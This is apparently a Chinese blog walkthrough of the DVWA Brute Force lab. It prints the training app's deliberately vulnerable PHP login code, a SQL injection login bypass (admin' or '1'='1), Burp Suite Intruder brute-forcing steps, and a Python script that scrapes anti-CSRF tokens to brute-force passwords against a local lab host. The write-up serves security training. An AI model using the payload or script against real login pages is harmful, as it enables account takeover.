if( isset( $_GET[ 'Login' ] ) ) {
// Get username
$user = $_GET[ 'username' ];
// Get password
$pass = $_GET[ 'password' ];
$pass = md5( $pass );
// Check the database
$query = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( ''
. ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '
' );
//可以发现只要query语句能够查询到结果,就可以进入这个if成功登录
if( $result && mysqli_num_rows( $result ) == 1 ) {
// Get users details
$row = mysqli_fetch_assoc( $result );
$avatar = $row["avatar"];
// Login successful
echo "Welcome to the password protected area { $user}
"; echo "{ $avatar}\" />"; } else { // Login failed echo ""; } ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res); } ?>
Username and/or password incorrect.
方法一:万能密码
虽然名为Brute Force,但第一题可以用SQL注入来做,并且非常简单。
观察源代码,不难发现只要query语句能够查询到结果,就可以成功登录。于是构造语句如下,成功登录:
关键代码解析
//这一句代码要求result语句能够查询到结果
if( $result && mysqli_num_rows( $result ) == 1 )
$query = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
//我们将 admin' or '1'='1 注入到代码中之后,由于后台没有对其进行过滤,我们得到的query语句如下:
SELECT * FROM `users` WHERE user = 'admin' or '1'='1' AND password = '$pass';
//这样,该语句就被or分成了两个部分,由于第一部分一定能够查询到结果,后面的语句并不影响最终结果,所以我们无需在数据库中匹配到正确密码,只要用户名正确就可以成功注入
if( isset( $_GET[ 'Login' ] ) ) {
// Sanitise username input
$user = $_GET[ 'username' ];
$user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Sanitise password input
$pass = $_GET[ 'password' ];
$pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$pass = md5( $pass );
// Check the database
$query = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( ''
. ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '
' );
if( $result && mysqli_num_rows( $result ) == 1 ) {
// Get users details
$row = mysqli_fetch_assoc( $result );
$avatar = $row["avatar"];
// Login successful
echo "Welcome to the password protected area { $user}
"; echo "{ $avatar}\" />"; } else { // Login failed sleep( 2 ); echo ""; } ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res); } ?>
Username and/or password incorrect.
PS:在这期间我遇到一个问题,burpsuite无法抓取本地数据包,于是我修改localhost为本机ip,因为localhost还会指向ipv6的域名,导致冲突,所以使用本机ipv4的ip就可以解决这一问题。
然后抓包,可以看到这里使用GET请求提交的用户名和密码参数,于是我们将抓取到的数据发送到Intruder,点击clear删除掉所有变量,然后光标选中密码对应值(这里是aaa),点击add将其设置为变量。
然后点击Payloads,输入破解用的密钥(如果有弱口令字典可以点load导入)。
PS:这里我又遇到一个问题,就是爆破之后返回状态码都为302重定向,如果有遇到这个问题的朋友,在Options最底下一项Redirection勾选always,就可以自动跟随重定向了。
然后点击右上角Start attack,可以看到payload为password一栏的length不一样,这就是我们想要的密码,第二题Over!
if( isset( $_GET[ 'Login' ] ) ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
// Sanitise username input
$user = $_GET[ 'username' ];
$user = stripslashes( $user );
$user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Sanitise password input
$pass = $_GET[ 'password' ];
$pass = stripslashes( $pass );
$pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$pass = md5( $pass );
// Check database
$query = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( ''
. ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '
' );
if( $result && mysqli_num_rows( $result ) == 1 ) {
// Get users details
$row = mysqli_fetch_assoc( $result );
$avatar = $row["avatar"];
// Login successful
echo "Welcome to the password protected area { $user}
"; echo "{ $avatar}\" />"; } else { // Login failed sleep( rand( 0, 3 ) ); echo ""; } ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res); } // Generate Anti-CSRF token generateSessionToken(); ?>
Username and/or password incorrect.
相对上一题,本题主要多了这几个特点:
方法一:Burpsuite抓包爆破
我们依然可以选择使用burpsuite来对其进行爆破,只是流程比上一题复杂了一点。首先配置代理,和上面一样,抓包然后ctrl + i,send to Intruder,点击clear,然后选中password和token的值,点add设置为变量,把上面的Attack type攻击类型选项设置为Pitchfork(叉子模式)
这里补充下Burpsuite的四种AttackType
Attack Type | 特点 |
---|---|
Sniper(狙击手) | 对变量依次进行破解,多个标记依次进行。对每个爆破点使用相同字典进行爆破(类似单线程) |
Battering ram(工程锤) | 对变量同时进行破解,多个标记同时进行。对多个爆破点使用相同字典同时进行爆破(类似多线程) |
Pitchfork(叉子) | 对两个爆破点使用不同字典同时进行爆破 |
Cluster Bomb(集束炸弹) | 相当于二重循环,对每个第一个点的值,循环对第二个点进行爆破(例如对多个用户,循环对每个用户名使用相同密码字典进行爆破) |
那Token值要怎么捕获到呢?通过查看网页源代码,我们可以知道它在value这个位置,注意复制这个value,后面有用。
还是先到Options里选择一直跟随重定向,然后去Grep - Extract(通过正则提取信息的一个模块)里点击add找value的值,结果???有点问题。没事,我们要的值就在下面,直接鼠标选中就行了
然后到Payloads,先设置导入字典,然后在Payloads Set中设置Payloads Set为2,Payloads Type为Recursive grep递归查找,把token值放进去,Start Attack,成功!
注:代码虽然写了很详细的注释,但还是推荐有学过python爬虫的朋友看,没有学过的朋友看起来可能比较困难。
如果有朋友学过爬虫,那答案也非常简单。我们可以使用脚本来抓取每次生成的token,在下一次登录时携带该token进行爆破,这里我们使用Python来编写这个爆破脚本,使用时记得替换获取到的Cookie值。
import requests
from lxml import etree
from bs4 import BeautifulSoup
# 获取页面中的Token
def getToken(url, headers):
# 得到HTML,并将其实例化为一个tree对象,利用xpath(类似选择器的原理)定位到token值所在位置并获取
page_text = requests.get(url=url, headers=headers).text
tree = etree.HTML(page_text)
user_token = tree.xpath('//form/input[4]/@value')[0]
print(user_token)
return user_token
if __name__ == "__main__":
# 设置参数进行UA伪装并携带Cookie
headers = {
'User-Agent':
'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0',
'Cookie': 'security=high; PHPSESSID=gqdal64o4bsbbgj0r9sg6r3lq0'
}
url = 'http://169.254.48.14/dvwa-master/vulnerabilities/brute/index.php'
# 从文件中获取用户名和密码进行爆破(这里的爆破模式类似于Burp中的Cluster Bomb模式)
count = 1
with open('user.txt', 'r', encoding='utf-8') as userList:
for admin in userList:
with open('password.txt', 'r', encoding='utf-8') as pwdList:
for line in pwdList:
username = admin.strip()
password = line.strip()
# 每次发送请求前获取token值,设置好get请求所需要的参数
user_token = getToken(url, headers)
payload = {
'username': username,
'password': password,
'Login': 'Login',
'user_token': user_token
}
response = requests.get(url=url, headers=headers, params=payload).content
# 整理下输出格式
print("{:<6}".format(count), "{:<15}".format(username), "{:<15}".format(password), len(response.decode()))
count += 1
结果如下,第4项字节长度与其他的不一致,即为管理员正确的用户密码。
感谢阅读,之后还会再更新DVWA的其他部分,感兴趣的朋友不妨点个关注。